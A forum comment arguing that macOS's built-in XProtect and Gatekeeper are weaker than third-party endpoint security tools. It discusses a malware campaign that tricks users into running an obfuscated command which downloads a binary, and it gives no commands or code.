Endpoint security software on the Mac, if it's worth the hit to system resources that is, inspect every call to exec and fork that occur in the kernel and also inspect those for known attack vectors, malicious scripts, etc. The one I have installed on my work Mac will kill reverse shell attempts before they are run. Will stop keychain attacks. Infostealing (as they can also get every file system op as they are happening in the kernel).

Gatekeeper and Xprotect are good, but there's only so much they can do.

Antivirus programs will run on PowerShell scripts, VBScript files, JScript files, and all other kinds of automation on Windows.

The screenshots from the article clearly show a permission prompt for a program. Whether that's a binary or a shell script or something else doesn't matter, the infection stage should've been caught by anti malware rather than permission prompts.

Windows Defender does this already. If Apple's AV can't catch this, I think they may be relying on their DRM-as-a-security-measure (signatures, notarisation, etc.) a bit too much.

> Scanning binaries for known malware is already built into the OS.

Clearly it isn't. XProtect is a joke. It's 2004-era ClamAV level of protection.

The article specifically mentions that the methodology here is to trick users into running an obfuscated CLI command…that downloads and runs a binary